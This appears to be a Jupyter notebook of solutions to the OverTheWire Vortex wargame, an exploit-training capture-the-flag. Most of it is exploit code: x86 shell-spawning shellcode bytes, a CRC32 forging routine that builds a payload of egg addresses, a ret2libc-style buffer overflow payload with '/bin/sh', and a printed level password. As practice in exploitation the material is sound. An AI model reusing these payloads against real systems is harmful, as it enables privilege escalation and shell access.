# Vortex Level 0 → Level 1 <br/>

https://overthewire.org/wargames/vortex/vortex0.html


In [1]:
import socket
import struct

HOST = "vortex.labs.overthewire.org"
PORT = 5842

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))

    result = 0
    for i in range(0, 4):
        data = s.recv(4)
        print(data)
        result += int.from_bytes(data, "little")
        # s.sendall(data)

    s.sendall(struct.pack("<I", result))
    data = s.recv(1024)
    print(data)

b'\xad\xad\xf6\x15'
b'+\xa9\xe8='
b'\x02\xc8\xb7b'
b'HI\x05\x00'
b'Username: vortex1 Password: Gq#qu3bF3'


# Vortex Level 1 → Level 2


In [24]:
0xFFFFFFFF - 0xCAFFFFFF

889192448

# Vortex Level 2 → Level 3


In [1]:
len(
    b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"
)

34

# Vortex Level 3 → Level 4


In [2]:
len(
    b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"
    + b"A" * 98
)

132

In [1]:
0xFFFFDB49

4294957897

In [3]:
0x252E7025

623800357

In [6]:
0xF7CB9056

4157313110

In [5]:
0xFBB29056

4222783574

In [12]:
0xDB49 - 0xFFFF

-9398

# Vortex Level 7 → Level 8


In [2]:
#!/usr/bin/env python
from struct import pack
import binascii

# Poly in "reversed" notation -- http://en.wikipedia.org/wiki/Cyclic_redundancy_check
POLY = 0xEDB88320  # CRC-32-IEEE 802.3
# POLY = 0x82F63B78 # CRC-32C (Castagnoli)
# POLY = 0xEB31D82E # CRC-32K (Koopman)
# POLY = 0xD5828281 # CRC-32Q


def build_crc_tables():
    for i in range(256):
        fwd = i
        rev = i << 24
        for j in range(8, 0, -1):
            # build normal table
            if (fwd & 1) == 1:
                fwd = (fwd >> 1) ^ POLY
            else:
                fwd >>= 1
            crc32_table[i] = fwd & 0xFFFFFFFF
            # build reverse table =)
            if rev & 0x80000000 == 0x80000000:
                rev = ((rev ^ POLY) << 1) | 1
            else:
                rev <<= 1
            rev &= 0xFFFFFFFF
            crc32_reverse[i] = rev


crc32_table, crc32_reverse = [0] * 256, [0] * 256
build_crc_tables()

seed = 0x0


def crc32(s):  # same crc32 as in (binascii.crc32)&0xffffffff
    crc = seed
    for c in s:
        crc = (crc >> 8) ^ crc32_table[(crc ^ c) & 0xFF]
    return crc ^ seed


def forge(wanted_crc, str, pos=None):
    if pos is None:
        pos = len(str)

    # forward calculation of CRC up to pos, sets current forward CRC state
    fwd_crc = seed
    for c in str[:pos]:
        fwd_crc = (fwd_crc >> 8) ^ crc32_table[(fwd_crc ^ c) & 0xFF]

    # backward calculation of CRC up to pos, sets wanted backward CRC state
    bkd_crc = wanted_crc ^ seed
    for c in str[pos:][::-1]:
        bkd_crc = ((bkd_crc << 8) & 0xFFFFFFFF) ^ crc32_reverse[bkd_crc >> 24] ^ c

    # deduce the 4 bytes we need to insert
    for c in pack("<L", fwd_crc)[::-1]:
        bkd_crc = ((bkd_crc << 8) & 0xFFFFFFFF) ^ crc32_reverse[bkd_crc >> 24] ^ c

    res = str[:pos] + pack("<L", bkd_crc) + str[pos:]
    assert binascii.crc32(res, 0xFFFFFFFF) ^ 0xFFFFFFFF == wanted_crc
    # assert crc32(res) == wanted_crc
    return res

In [ ]:
EGG2_ADDRESS = 0xFFFFDCDF

wanted_crc = 0xE1CA95EE
payload = forge(
    wanted_crc,
    b"a" * 2 + struct.pack("<I", EGG2_ADDRESS) * 16,
)

check = binascii.crc32(payload, 0xFFFFFFFF) ^ 0xFFFFFFFF
print(f"hex(check) = {hex(check)}")
print(f"wanted_crc = {hex(wanted_crc)}")
print(f"payload = {payload}")

hex(check) = 0xe1ca95ee
wanted_crc = 0xe1ca95ee
payload = b'aa\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xdf\xdc\xff\xff\xc7\xec\x90\xa7'


# Vortex Level 8 → Level 9


In [1]:
bytes.fromhex("b90ca00408bb77ddffff8919")

b'\xb9\x0c\xa0\x04\x08\xbbw\xdd\xff\xff\x89\x19'

In [2]:
len(b"\xb9\x0c\xa0\x04\x08\xbbw\xdd\xff\xff\x89\x19")

12

# Vortex Level 10 → Level 11


In [2]:
hex(0x0804D01C - 0x40)

'0x804cfdc'

In [5]:
0x800

2048

# Vortex Level 12 → Level 13


In [ ]:
import sys
import struct

padding = b"A" * 1036
exec_addr = struct.pack("<I", 0xF7E5FE40)
argv_array = struct.pack("<II", 0xF7E5FE40, 0)
egg_addr = struct.pack("<I", 0xFFFFDDEB)

sys.stdout.buffer.write(
    padding + exec_addr + b"\x90" * 4 + egg_addr + b"/bin/sh\x00" + argv_array
)

b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

In [14]:
struct.pack("<I", 0xF7006873)

b'sh\x00\xf7'